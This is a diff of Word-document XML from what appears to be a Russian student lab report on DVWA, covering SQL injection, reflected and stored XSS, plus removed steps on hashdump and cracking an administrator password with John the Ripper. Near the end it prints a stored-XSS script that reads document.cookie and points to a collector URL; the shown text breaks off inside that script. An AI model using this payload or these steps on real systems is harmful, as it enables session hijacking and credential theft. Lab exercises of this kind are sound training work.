-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>Рисунок</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2381,54 +2728,15 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Результат выполнения </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hashdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="aa"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> – Результат выполнения команды </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ping</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2437,31 +2745,42 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="12"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Получение пароля администратора (с помощью </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>JohnTheRipper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Выбор уровня </w:t>
+      </w:r>
+      <w:r>
+        <w:t>low</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> после авторизации в </w:t>
+      </w:r>
+      <w:r>
+        <w:t>DVWA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
         <w:t>):</w:t>
@@ -2469,25 +2788,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="aa"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDC5388" wp14:editId="28738F59">
-            <wp:extent cx="5758180" cy="5910580"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="7" name="Рисунок 7"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F46B3D4" wp14:editId="398A5C99">
+            <wp:extent cx="5758180" cy="3743960"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="17" name="Рисунок 17"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2507,7 +2820,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5758180" cy="5910580"/>
+                      <a:ext cx="5758180" cy="3743960"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2522,34 +2835,1269 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">– Авторизация в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DVWA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>На рисунках 6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>показаны результаты в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>ыполн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ения </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">задания во вкладках: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Reflected</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_Hlk152267738"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Stored</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F7E1A44" wp14:editId="1F875EC2">
+            <wp:extent cx="4950460" cy="3218782"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
+            <wp:docPr id="23" name="Рисунок 23"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4953801" cy="3220954"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="aa"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>Рисунок 5 – Получение пароля администратора</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Р</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">езультат выполнения задания во </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">вкладке </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>ур</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>low</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="aa"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69BB1D6A" wp14:editId="6F45EB89">
+            <wp:extent cx="4887031" cy="3177540"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
+            <wp:docPr id="24" name="Рисунок 24"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4887461" cy="3177820"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Результат выполнения задания во вкладке </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Reflected</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>ур</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ow</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Скрипт из задания </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Stored</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="851"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="851"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>collectURL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>http://127.0.0.1:8080/collect';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="851"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>currentCookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="851"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>document.getElementById</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cookieField</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">').value = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>currentCookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="851"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  var form = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>document.querySelector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>('form');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="851"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
